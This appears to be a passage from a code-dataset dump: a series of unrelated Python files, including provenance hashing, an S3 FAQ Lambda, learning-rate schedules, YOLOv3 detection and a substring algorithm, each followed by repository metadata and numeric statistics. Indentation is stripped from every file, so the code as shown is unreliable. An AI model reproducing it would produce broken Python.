provenance=provenance.to_dict(),
value_hash=value_hash,
)
)
@classmethod
def from_yaml(cls, yaml_str, metadata_url):
try:
body_dict = yaml.load(yaml_str, Loader=YamlLoader)
except yaml.error.YAMLError as e:
raise YamlRecordParsingError(f"Couldn't parse {cls.__name__}") from e
record = cls(body_dict=body_dict)
record.artifact_url = derelativize_url(record.artifact_url, metadata_url)
return record
def __init__(self, body_dict):
try:
self._dict = body_dict
self.descriptor = self._dict["descriptor"]
self.artifact_url = self._dict["artifact_url"]
self.provenance = Provenance.from_dict(self._dict["provenance"])
self.value_hash = self._dict["value_hash"]
except KeyError as e:
raise YamlRecordParsingError(
f"YAML for ArtifactMetadataRecord was missing field: {e}"
)
def to_yaml(self):
return yaml.dump(
self._dict, default_flow_style=False, encoding=None, Dumper=YamlDumper,
)
def __repr__(self):
return f"ArtifactMetadataRecord({self.descriptor!r})"
class Provenance:
"""
    Describes the code and data used to generate a (possibly-yet-to-be-computed)
value. Provides a set of hashes that can be used to determine if two
such values are meaningfully different, without actually examining the
values.
Provenances can "match" at several different levels of precision.
1. Functional match: all input data is the same, and all functions involved
in the computation have matching major versions. This is the lowest level
of matching, but it's a sufficient condition to treat two artifacts as
interchangeable. The only purpose of the higher levels is to allow
recursive searches for possible versioning errors, where the user has
changed a function's bytecode but failed to update its version.
2. Nominal match: as above, plus the function that computes this value has
a matching minor version. If two provenances don't nominally match, then
they have different versions, which means this particular descriptor doesn't
have a versioning error (although its dependencies might or might not).
3. "Samecode" match: as above, plus the function that computes this value
has matching bytecode. If two provenances are a nominal match but not
a samecode match, that suggests the user may have made a versioning error
in this descriptor.
4. Exact match: as above, plus all dependencies exactly match. If two
provenances exactly match, then there is no chance of any versioning error
anywhere in this descriptor's dependency tree.
"""
@classmethod
def from_computation(
cls,
code_fingerprint,
case_key,
dep_provenance_digests_by_task_key,
treat_bytecode_as_functional,
can_functionally_change_per_run,
flow_instance_uuid,
):
dep_task_key_provenance_digest_pairs = sorted(
dep_provenance_digests_by_task_key.items()
)
functional_code_dict = dict(
orig_flow_name=code_fingerprint.orig_flow_name,
code_version_major=code_fingerprint.version.major,
cache_schema_version=CACHE_SCHEMA_VERSION,
)
nonfunctional_code_dict = dict(
code_version_minor=code_fingerprint.version.minor,
)
bytecode_hash = code_fingerprint.bytecode_hash
if treat_bytecode_as_functional:
functional_code_dict["bytecode_hash"] = bytecode_hash
else:
nonfunctional_code_dict["bytecode_hash"] = bytecode_hash
# The function's output changes with each run; to reflect that,
# we add the flow uuid to the hash so that it will be different
# each time.
if can_functionally_change_per_run:
functional_code_dict["flow_instance_uuid"] = flow_instance_uuid
full_code_dict = dict(
functional=functional_code_dict,
nonfunctional=nonfunctional_code_dict,
bytecode_hash=bytecode_hash,
)
functional_deps_list = [
dict(
descriptor=task_key.dnode.to_descriptor(),
hash=provenance_digest.functional_hash,
)
for task_key, provenance_digest in dep_task_key_provenance_digest_pairs
]
exact_deps_list = [
dict(
descriptor=task_key.dnode.to_descriptor(),
hash=provenance_digest.exact_hash,
)
for task_key, provenance_digest in dep_task_key_provenance_digest_pairs
]
exact_deps_hash = hash_simple_obj_to_hex(exact_deps_list)
functional_hash = hash_simple_obj_to_hex(
dict(code=functional_code_dict, deps=functional_deps_list,)
)
exact_hash = hash_simple_obj_to_hex(
dict(code=full_code_dict, deps=exact_deps_list,)
)
return cls(
body_dict=dict(
case_key=dict(case_key),
code=full_code_dict,
functional_deps=functional_deps_list,
functional_hash=functional_hash,
exact_hash=exact_hash,
exact_deps_hash=exact_deps_hash,
)
)
@classmethod
def from_dict(cls, body_dict):
return cls(body_dict=body_dict)
def __init__(self, body_dict=None):
self._dict = body_dict
d = self._dict
self.functional_hash = d["functional_hash"]
self.exact_hash = d["exact_hash"]
self.exact_deps_hash = d["exact_deps_hash"]
self.code_version_major = d["code"]["functional"]["code_version_major"]
self.code_version_minor = d["code"]["nonfunctional"]["code_version_minor"]
self.bytecode_hash = d["code"]["bytecode_hash"]
def to_dict(self):
return self._dict
def __repr__(self):
hash_fn = self.functional_hash[:8]
v_maj = self.code_version_major
v_min = self.code_version_minor
hash_ex = self.exact_hash[:8]
return f"Provenance[{hash_fn}/{v_maj}.{v_min}/{hash_ex}]"
def exactly_matches(self, prov):
return self.exact_hash == prov.exact_hash
def dependencies_exactly_match(self, prov):
return self.exact_deps_hash == prov.exact_deps_hash
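# A minimal construction sketch (hypothetical paths; FakeCloudStore stands in
# for GCS as described in its docstring):
#
#     local = LocalStore("/tmp/bionic-cache/local")
#     cloud = FakeCloudStore("/tmp/bionic-cache/fake-cloud")
#     cache = PersistentCache(local, cloud)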
| 34.656222
| 88
| 0.623415
| 4,657
| 38,711
| 4.927636
| 0.133562
| 0.020132
| 0.005229
| 0.007844
| 0.323296
| 0.264075
| 0.227079
| 0.19396
| 0.150558
| 0.126634
| 0
| 0.002351
| 0.307742
| 38,711
| 1,116
| 89
| 34.687276
| 0.853982
| 0.205213
| 0
| 0.283934
| 0
| 0
| 0.077908
| 0.008346
| 0
| 0
| 0
| 0.003584
| 0.012465
| 1
| 0.092798
| false
| 0.001385
| 0.022161
| 0.024931
| 0.239612
| 0.006925
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af84d23224addc1fdc1ef092243757bb1b97c61d
| 925
|
py
|
Python
|
faq/lambda_function.py
|
david-fisher/320-S20-Track2
|
4bdda4701dac75dafaa09fa68a8502d7c5279502
|
[
"BSD-3-Clause"
] | 8
|
2019-12-30T16:37:53.000Z
|
2020-04-09T17:18:14.000Z
|
faq/lambda_function.py
|
david-fisher/320-S20-Track2
|
4bdda4701dac75dafaa09fa68a8502d7c5279502
|
[
"BSD-3-Clause"
] | 95
|
2020-02-03T15:13:19.000Z
|
2020-05-05T01:00:16.000Z
|
faq/lambda_function.py
|
david-fisher/320-S20-Track2
|
4bdda4701dac75dafaa09fa68a8502d7c5279502
|
[
"BSD-3-Clause"
] | null | null | null |
import json
import boto3
#Last Updated
#5/3/2020
s3 = boto3.client('s3') #S3 object
def lambda_handler(event, context):
#Initializing the variables
bucket = 't2-bucket-storage'
key = 'FAQ.txt'
#CORS headers
response_headers = {}
response_headers["X-Requested-With"] = "*"
response_headers["Access-Control-Allow-Origin"] = "*"
response_headers["Access-Control-Allow-Headers"] = "Content-Type,X-Amz-Date,Authorization,X-Api-Key,x-requested-with'"
response_headers["Access-Control-Allow-Methods"] = "OPTIONS,POST,GET,PUT,DELETE"
#Getting the data from the bucket
data = s3.get_object(Bucket=bucket, Key=key)
jsonData = data['Body'].read() #This will read the faq page for its contents
#Returning the faq content here
return {
'statusCode': 200,
'body': jsonData,
'headers': response_headers,
'isBase64Encoded': False
}
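# Local smoke-test sketch (an addition, not part of the original file):
# assumes AWS credentials are configured and the bucket/key above exist,
# and invokes the handler the same way Lambda would, with an empty event.
if __name__ == "__main__":
    print(lambda_handler({}, None))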
| 30.833333
| 122
| 0.665946
| 116
| 925
| 5.241379
| 0.568966
| 0.148026
| 0.108553
| 0.138158
| 0.208882
| 0.154605
| 0.154605
| 0.154605
| 0
| 0
| 0
| 0.024423
| 0.203243
| 925
| 29
| 123
| 31.896552
| 0.800543
| 0.187027
| 0
| 0
| 0
| 0.052632
| 0.348118
| 0.235215
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0.105263
| 0
| 0.210526
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af85b8246d06deab8fbd40d2dd688d0cf7df337f
| 1,582
|
py
|
Python
|
easy_rl/utils/learning_rate_utils.py
|
simonoso/EasyRL
|
3d8eb2bf138dd2a0b95f8b3743d15f34cfff0740
|
[
"Apache-2.0"
] | 125
|
2019-12-05T02:50:56.000Z
|
2022-02-22T08:03:24.000Z
|
easy_rl/utils/learning_rate_utils.py
|
simonoso/EasyRL
|
3d8eb2bf138dd2a0b95f8b3743d15f34cfff0740
|
[
"Apache-2.0"
] | 4
|
2020-03-18T05:56:22.000Z
|
2020-07-11T11:10:17.000Z
|
easy_rl/utils/learning_rate_utils.py
|
simonoso/EasyRL
|
3d8eb2bf138dd2a0b95f8b3743d15f34cfff0740
|
[
"Apache-2.0"
] | 26
|
2019-12-12T06:25:47.000Z
|
2022-01-19T22:19:41.000Z
|
import tensorflow as tf
class LearningRateStrategy(object):
def __init__(self, init_lr, strategy_spec):
self._type = strategy_spec.pop('type', 'exponential_decay')
self._decay_steps = strategy_spec.pop('decay_steps', 1000)
self._decay_rate = strategy_spec.pop('decay_rate', 0.9)
self._kwargs = strategy_spec
self._init_lr = init_lr
def __call__(self, global_step):
if self._type == 'exponential_decay':
lr = tf.train.exponential_decay(
learning_rate=self._init_lr,
global_step=global_step,
decay_steps=self._decay_steps,
decay_rate=self._decay_rate,
**self._kwargs)
elif self._type == 'polynomial_decay':
lr = tf.train.polynomial_decay(
learning_rate=self._init_lr,
global_step=global_step,
decay_steps=self._decay_steps,
**self._kwargs)
elif self._type == 'natural_exp_decay':
lr = tf.train.natural_exp_decay(
learning_rate=self._init_lr,
global_step=global_step,
decay_steps=self._decay_steps,
                decay_rate=self._decay_rate,
                **self._kwargs)
elif self._type == 'inverse_time_decay':
lr = tf.train.inverse_time_decay(
learning_rate=self._init_lr,
global_step=global_step,
decay_steps=self._decay_steps,
decay_rate=self._decay_rate,
**self._kwargs)
        else:
            raise ValueError(
                'unknown learning rate strategy type: {}'.format(self._type))
        return lr
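# Usage sketch (an addition, assuming TensorFlow 1.x, which matches the
# tf.train.* decay ops used above): build a decayed learning-rate tensor
# from the global step.
if __name__ == "__main__":
    global_step = tf.train.get_or_create_global_step()
    lr_schedule = LearningRateStrategy(
        0.01, {'type': 'exponential_decay', 'decay_steps': 500, 'decay_rate': 0.95})
    lr_tensor = lr_schedule(global_step)
    print(lr_tensor)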
| 38.585366
| 67
| 0.591656
| 180
| 1,582
| 4.711111
| 0.2
| 0.117925
| 0.070755
| 0.066038
| 0.502358
| 0.476415
| 0.476415
| 0.476415
| 0.476415
| 0.476415
| 0
| 0.005581
| 0.32048
| 1,582
| 40
| 68
| 39.55
| 0.783256
| 0
| 0
| 0.472222
| 0
| 0
| 0.069532
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0.027778
| 0
| 0.138889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af8721001b7e64b7b7d1b084ad899f44e8598884
| 2,841
|
py
|
Python
|
plenum/test/node_request/test_split_non_3pc_messages_on_batches.py
|
ArtObr/indy-plenum
|
c568eefb0042b3ec3aec84e9241cb1b5df419365
|
[
"Apache-2.0"
] | null | null | null |
plenum/test/node_request/test_split_non_3pc_messages_on_batches.py
|
ArtObr/indy-plenum
|
c568eefb0042b3ec3aec84e9241cb1b5df419365
|
[
"Apache-2.0"
] | null | null | null |
plenum/test/node_request/test_split_non_3pc_messages_on_batches.py
|
ArtObr/indy-plenum
|
c568eefb0042b3ec3aec84e9241cb1b5df419365
|
[
"Apache-2.0"
] | null | null | null |
from functools import partial
import pytest
from plenum.test import waits
from plenum.test.helper import sendRandomRequests, waitForSufficientRepliesForRequests, checkReqAck
from plenum.test.pool_transactions.helper import buildPoolClientAndWallet
from stp_core.loop.eventually import eventuallyAll
from stp_core.validators.message_length_validator import MessageLenValidator
from plenum.test.pool_transactions.conftest import looper, client1Connected # noqa
from plenum.test.pool_transactions.conftest import clientAndWallet1, client1, wallet1 # noqa
def test_msg_max_length_check_node_to_node(looper,
txnPoolNodeSet,
client1,
wallet1,
client1Connected,
clientAndWallet2):
"""
Two clients send 2*N requests each at the same time.
N < MSG_LEN_LIMIT but 2*N > MSG_LEN_LIMIT so the requests pass the max
length check for client-node requests but do not pass the check
for node-node requests.
"""
N = 10
# it is an empirical value for N random requests
# it has to be adjusted if the world changed (see pydoc)
max_len_limit = 3000
patch_msg_len_validators(max_len_limit, txnPoolNodeSet)
client2, wallet2 = clientAndWallet2
reqs1 = sendRandomRequests(wallet1, client1, N)
reqs2 = sendRandomRequests(wallet2, client2, N)
check_reqacks(client1, looper, reqs1, txnPoolNodeSet)
check_reqacks(client2, looper, reqs2, txnPoolNodeSet)
waitForSufficientRepliesForRequests(looper, client1, requests=reqs1)
waitForSufficientRepliesForRequests(looper, client2, requests=reqs2)
def patch_msg_len_validators(max_len_limit, txnPoolNodeSet):
for node in txnPoolNodeSet:
assert hasattr(node.nodestack, 'msgLenVal')
assert hasattr(node.nodestack, 'msg_len_val')
node.nodestack.msgLenVal = MessageLenValidator(max_len_limit)
node.nodestack.msg_len_val = MessageLenValidator(max_len_limit)
def check_reqacks(client, looper, reqs, txnPoolNodeSet):
reqack_coros = []
for req in reqs:
reqack_coros.extend([partial(checkReqAck, client, node, req.identifier,
req.reqId, None) for node in txnPoolNodeSet])
timeout = waits.expectedReqAckQuorumTime()
looper.run(eventuallyAll(*reqack_coros, totalTimeout=timeout))
@pytest.fixture(scope="module")
def clientAndWallet2(looper, poolTxnClientData, tdirWithClientPoolTxns):
client, wallet = buildPoolClientAndWallet(poolTxnClientData,
tdirWithClientPoolTxns)
looper.add(client)
looper.run(client.ensureConnectedToNodes())
yield client, wallet
client.stop()
| 38.917808
| 99
| 0.697994
| 297
| 2,841
| 6.52862
| 0.37037
| 0.028881
| 0.036101
| 0.027849
| 0.130995
| 0.092831
| 0.092831
| 0.047447
| 0
| 0
| 0
| 0.015726
| 0.239
| 2,841
| 72
| 100
| 39.458333
| 0.881129
| 0.114044
| 0
| 0
| 0
| 0
| 0.010459
| 0
| 0
| 0
| 0
| 0
| 0.043478
| 1
| 0.086957
| false
| 0
| 0.195652
| 0
| 0.282609
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af8a181071e7abdcc867b84eb6bf5ea64085f25a
| 717
|
py
|
Python
|
churnalyze/py/churn_stats.py
|
Rdeandres/fight-churn
|
88fbff9b00f5ec4a9622073db15ab8809dfb21b3
|
[
"MIT"
] | null | null | null |
churnalyze/py/churn_stats.py
|
Rdeandres/fight-churn
|
88fbff9b00f5ec4a9622073db15ab8809dfb21b3
|
[
"MIT"
] | null | null | null |
churnalyze/py/churn_stats.py
|
Rdeandres/fight-churn
|
88fbff9b00f5ec4a9622073db15ab8809dfb21b3
|
[
"MIT"
] | null | null | null |
import sys
from churn_calc import ChurnCalculator
def main():
'''
Creates churn calculator and runs the statistics and correlation functions.
The schema name is taken from the first command line argument.
The dataset and all other parameters are then taken from the schema configuration.
:return: None
'''
schema = 'churnsim2'
if len(sys.argv) >= 2:
schema = sys.argv[1]
dataset = None
if len(sys.argv) >= 3:
dataset = sys.argv[2]
churn_calc = ChurnCalculator(schema,dataset)
churn_calc.dataset_stats(save=True)
churn_calc.dataset_corr(save=True)
churn_calc.dataset_corr(save=True,use_scores=False)
if __name__ == "__main__":
main()
| 23.9
| 86
| 0.687587
| 97
| 717
| 4.907216
| 0.484536
| 0.094538
| 0.10084
| 0.05042
| 0.134454
| 0.134454
| 0.134454
| 0.134454
| 0
| 0
| 0
| 0.008993
| 0.224547
| 717
| 29
| 87
| 24.724138
| 0.847122
| 0.327755
| 0
| 0
| 0
| 0
| 0.037445
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.133333
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af8b4f7cdd96f1e05ccc0b6456d5fe449a767019
| 2,888
|
py
|
Python
|
python/contrib/head_pose_picture/src/yolov3/yolov3.py
|
coldenheart/123
|
798768bba7dfaef051a46d8e1df48bc671de5213
|
[
"Apache-2.0"
] | 25
|
2020-11-20T09:01:35.000Z
|
2022-03-29T10:35:38.000Z
|
python/contrib/head_pose_picture/src/yolov3/yolov3.py
|
coldenheart/123
|
798768bba7dfaef051a46d8e1df48bc671de5213
|
[
"Apache-2.0"
] | 5
|
2021-02-28T20:49:37.000Z
|
2022-03-04T21:50:27.000Z
|
python/contrib/head_pose_picture/src/yolov3/yolov3.py
|
coldenheart/123
|
798768bba7dfaef051a46d8e1df48bc671de5213
|
[
"Apache-2.0"
] | 16
|
2020-12-06T07:26:13.000Z
|
2022-03-01T07:51:55.000Z
|
"""Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License."""
import yolov3.yolov3_postprocessing as postprocessing
import numpy as np
import cv2
import os
class YOLOV3(object):
"""YOLOv3"""
def __init__(self, camera_height, camera_width, yolo_model):
# load YOLO model
self.yolo_v3 = yolo_model
# parameters for preprocessing
self.ih, self.iw = (camera_height, camera_width)
self.h, self.w = (416, 416)
self.scale = min(self.w / self.iw, self.h / self.ih)
self.nw = int(self.iw * self.scale)
self.nh = int(self.ih * self.scale)
# parameters for postprocessing
self.image_shape = [camera_height, camera_width]
self.model_shape = [self.h, self.w]
self.num_classes = 1
self.anchors = self.get_anchors()
def get_anchors(self):
"""return anchors
Returns:
[ndarray]: anchors array
"""
SRC_PATH = os.path.realpath(__file__).rsplit("/", 1)[0]
anchors_path = os.path.join(SRC_PATH, './yolo_anchors.txt')
with open(anchors_path) as f:
anchors = f.readline()
anchors = [float(x) for x in anchors.split(',')]
return np.array(anchors).reshape(-1, 2)
def inference(self, img):
"""Run YOLOv3 for face detection
Args:
img ([ndarray]): image (416, 416, 3)
"""
# preprocessing: resize and paste input image to a new image with size 416*416
img = np.array(img, dtype='float32')
img_resize = cv2.resize(img, (self.nw, self.nh),
interpolation=cv2.INTER_CUBIC)
img_new = np.ones((416, 416, 3), np.float32) * 128
img_new[(self.h - self.nh) // 2: ((self.h - self.nh) // 2 + self.nh),
(self.w - self.nw) // 2: (self.w - self.nw) // 2 + self.nw, :] = img_resize[:, :, :]
img_new = img_new / 255.
# inference
resultList = self.yolo_v3.execute([img_new])
out_list = [resultList[0], resultList[1], resultList[2]]
# convert yolo output to box axis and score
box_axis, box_score = postprocessing.yolo_eval(
out_list, self.anchors, self.num_classes, self.image_shape)
        # get the crop image and corresponding width/height info for WHENet
nparryList, boxList = postprocessing.get_box_img(img, box_axis)
return nparryList, boxList
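# Usage sketch (an addition with hypothetical names): `model` stands for an
# offline-model wrapper exposing .execute([inputs]) as assumed by inference()
# above, and `frame` is a BGR camera image.
# detector = YOLOV3(camera_height=720, camera_width=1280, yolo_model=model)
# crops, boxes = detector.inference(frame)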
| 39.027027
| 100
| 0.630194
| 398
| 2,888
| 4.454774
| 0.379397
| 0.033841
| 0.025381
| 0.038917
| 0.062042
| 0.031585
| 0
| 0
| 0
| 0
| 0
| 0.028972
| 0.259003
| 2,888
| 73
| 101
| 39.561644
| 0.799533
| 0.322715
| 0
| 0
| 0
| 0
| 0.014369
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.081081
| false
| 0
| 0.108108
| 0
| 0.27027
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af8d86b547c3138c87e5922ed826526a715c832e
| 3,466
|
py
|
Python
|
rstbx/simulation/sim_pdf.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 155
|
2016-11-23T12:52:16.000Z
|
2022-03-31T15:35:44.000Z
|
rstbx/simulation/sim_pdf.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 590
|
2016-12-10T11:31:18.000Z
|
2022-03-30T23:10:09.000Z
|
rstbx/simulation/sim_pdf.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 115
|
2016-11-15T08:17:28.000Z
|
2022-02-09T15:30:14.000Z
|
from __future__ import absolute_import, division, print_function
from six.moves import range
from scitbx.array_family import flex
page_origin = (20.,220.)
boxedge = 500.
class PointTransform:
'''provide the necessary transformation to go from image pixel coordinates
to coordinates on the printed page of the .pdf report'''
def __init__(self,detector_edge):
self.boxedge = boxedge
self.page_origin = page_origin
self.size1 = detector_edge
self.size2 = detector_edge
self.subwindow_origin=[0.,0.]
self.subwindow_fraction=1.
def toPage(self, image_pixel_xy):
image_fractional_coords = ((1.-image_pixel_xy[0]/self.size1),
image_pixel_xy[1]/self.size2)
image_subwindow_coords = ((image_fractional_coords[1]-self.subwindow_origin[1])/
self.subwindow_fraction,
(image_fractional_coords[0]-self.subwindow_origin[0])/
self.subwindow_fraction)
if 0.<image_subwindow_coords[0]<1. and 0.<image_subwindow_coords[1]<1.:
page_coords = (image_subwindow_coords[0]*self.boxedge + self.page_origin[0],
(1.-image_subwindow_coords[1])*self.boxedge + self.page_origin[1]
)
return page_coords
return None
from reportlab.pdfgen.canvas import Canvas
from reportlab.lib.pagesizes import letter
from reportlab.lib.units import cm,mm
class Graph:
def __init__(self,fileout):
self.c = Canvas(fileout,pagesize=letter)
def title(self,text):
print(text)
lines = text.split('\n')
self.c.setFont('Helvetica',12)
self.c.drawString(2*cm,26*cm,lines[0])
if len(lines)>1:
self.c.drawString(2*cm,25.5*cm,lines[1])
def setTransform(self,detector_edge):
#given the raw image fractional coordinates of the subwindow origin
self.T = PointTransform(detector_edge)
def __del__(self):
self.c.save()
class PDF:
def __init__(self,filename):
self.R = Graph(filename)
def make_image_plots_detail(self,ray_sim):
normal = ray_sim.sim.tracing_impacts
self.R.setTransform(ray_sim.detector.raw.focus()[0])
self.R.title(
"%.3f bandpass + %.3f degrees mosaicity (full widths); perfect optics"%(
ray_sim.sim.bandpass,
ray_sim.sim.mosaicity)+
"\nEnergy %4.1f KeV; Detector distance %6.1f mm; Limiting resolution %6.2f Angstrom"%(
(12.398/(ray_sim.camera.lambda0*1E10)),
ray_sim.camera.distance*1000.,
ray_sim.structure.limiting_resolution))
data_array = 255-ray_sim.image
import numpy
try:
import PIL.Image as Image
except ImportError:
import Image
imageout = Image.frombuffer("L",data_array.focus(),
data_array.as_numpy_array().astype(numpy.uint8).tostring(),
"raw","L",0,1
)
self.R.c.drawInlineImage(imageout,x=2*cm,y=9*cm, width=15*cm, height=15*cm)
self.R.c.showPage()
return self
if __name__=="__main__":
data_array = flex.double(flex.grid((768,768)),1.0)
print(data_array.focus())
data_array = flex.double(flex.grid((7,7)),255)
for x in range(7):
data_array[(3,x)] = 0.
data_array[(x,3)] = 0.
try:
import PIL.Image as Image
except ImportError:
import Image
import numpy
args = ("L",0,1)
imageout = Image.frombuffer("L",data_array.focus(),
data_array.as_float().as_numpy_array().astype(numpy.uint8).tostring(),
"raw","L",0,1)
imageout.save("newfile.png","PNG")
| 31.798165
| 89
| 0.671091
| 490
| 3,466
| 4.542857
| 0.322449
| 0.040431
| 0.044924
| 0.028302
| 0.196766
| 0.151842
| 0.127583
| 0.127583
| 0.127583
| 0.127583
| 0
| 0.036863
| 0.201673
| 3,466
| 108
| 90
| 32.092593
| 0.767618
| 0.055395
| 0
| 0.137931
| 0
| 0.011494
| 0.060374
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.091954
| false
| 0.022989
| 0.16092
| 0
| 0.321839
| 0.034483
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af950ed2adf47bfd5bbac8fc2d72461c9405f310
| 1,809
|
py
|
Python
|
lemonspotter/samplers/declare.py
|
martinruefenacht/lemonspotter
|
4e24759aded6536bbb3cdcc311e5eaf72d52c4e3
|
[
"MIT"
] | null | null | null |
lemonspotter/samplers/declare.py
|
martinruefenacht/lemonspotter
|
4e24759aded6536bbb3cdcc311e5eaf72d52c4e3
|
[
"MIT"
] | 20
|
2019-11-14T16:35:42.000Z
|
2021-05-17T14:55:44.000Z
|
lemonspotter/samplers/declare.py
|
martinruefenacht/lemonspotter
|
4e24759aded6536bbb3cdcc311e5eaf72d52c4e3
|
[
"MIT"
] | null | null | null |
"""
This module contains the definition of the DefaultSampler.
"""
import logging
from typing import Iterable
from lemonspotter.core.parameter import Direction
from lemonspotter.core.sampler import Sampler
from lemonspotter.core.variable import Variable
from lemonspotter.core.function import Function
from lemonspotter.core.sample import FunctionSample
class DeclarationSampler(Sampler):
"""
This class implements the DefaultSampler behaviour. It uses the default values from the
specification types to create a single Variable.
"""
def __str__(self) -> str:
return type(self).__name__
def generate_samples(self, function: Function) -> Iterable[FunctionSample]:
"""
"""
logging.debug('DeclarationSampler used for %s', function.name)
def evaluator() -> bool:
raise NotImplementedError('DeclarationSampler only generates compilable ' +
'code, not runnable.')
# generate valid but empty arguments
arguments = []
variables = set()
for parameter in function.parameters: # type: ignore
if parameter.direction == Direction.OUT and parameter.type.dereferencable:
mem_alloc = f'malloc(sizeof({parameter.type.dereference().language_type}))'
variable = Variable(parameter.type, f'arg_{parameter.name}', mem_alloc)
variables.add(variable)
else:
variable = Variable(parameter.type, f'arg_{parameter.name}')
variables.add(variable)
logging.debug('declaring variable argument: %s', variable.name)
arguments.append(variable)
sample = FunctionSample(function, True, variables, arguments, evaluator)
return set([sample])
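# Usage sketch (an addition with hypothetical names): `func` stands for a
# lemonspotter Function loaded from a specification; a no-argument Sampler
# constructor is assumed here, not confirmed by the source.
# sampler = DeclarationSampler()
# samples = sampler.generate_samples(func)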
| 33.5
| 91
| 0.66335
| 183
| 1,809
| 6.480874
| 0.459016
| 0.067454
| 0.084317
| 0.048904
| 0.077572
| 0.077572
| 0.077572
| 0.077572
| 0
| 0
| 0
| 0
| 0.250415
| 1,809
| 53
| 92
| 34.132075
| 0.874631
| 0.139856
| 0
| 0.068966
| 0
| 0
| 0.147832
| 0.039422
| 0
| 0
| 0
| 0
| 0
| 1
| 0.103448
| false
| 0
| 0.241379
| 0.034483
| 0.448276
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af9558754aad314aeb8db737a2091bb0a63f662a
| 480
|
py
|
Python
|
source/python/LSWRC.py
|
JoHyukJun/algorithm-analysis
|
3eda22ce0eeb52490702206d73c04cff1eb3e72d
|
[
"Apache-2.0"
] | null | null | null |
source/python/LSWRC.py
|
JoHyukJun/algorithm-analysis
|
3eda22ce0eeb52490702206d73c04cff1eb3e72d
|
[
"Apache-2.0"
] | null | null | null |
source/python/LSWRC.py
|
JoHyukJun/algorithm-analysis
|
3eda22ce0eeb52490702206d73c04cff1eb3e72d
|
[
"Apache-2.0"
] | null | null | null |
'''
main.py
Created by JO HYUK JUN on 2021
Copyright © 2021 JO HYUK JUN. All rights reserved.
'''
class Solution:
def lengthOfLongestSubstring(self, s: str) -> int:
output = 0
str_set = []
for idx, val in enumerate(s):
if val in str_set:
str_set = str_set[str_set.index(val) + 1:]
str_set.append(val)
output = max(output, len(str_set))
return output
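# Quick self-check of the sliding-window logic above (an addition).
if __name__ == "__main__":
    assert Solution().lengthOfLongestSubstring("abcabcbb") == 3  # "abc"
    assert Solution().lengthOfLongestSubstring("bbbbb") == 1     # "b"
    assert Solution().lengthOfLongestSubstring("") == 0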
| 21.818182
| 58
| 0.525
| 62
| 480
| 3.967742
| 0.596774
| 0.170732
| 0.109756
| 0.146341
| 0.097561
| 0.097561
| 0
| 0
| 0
| 0
| 0
| 0.033784
| 0.383333
| 480
| 22
| 59
| 21.818182
| 0.793919
| 0.1875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0
| 0
| 0.3
| 0
| 0
| 0
| 0
| null | 0
| 0
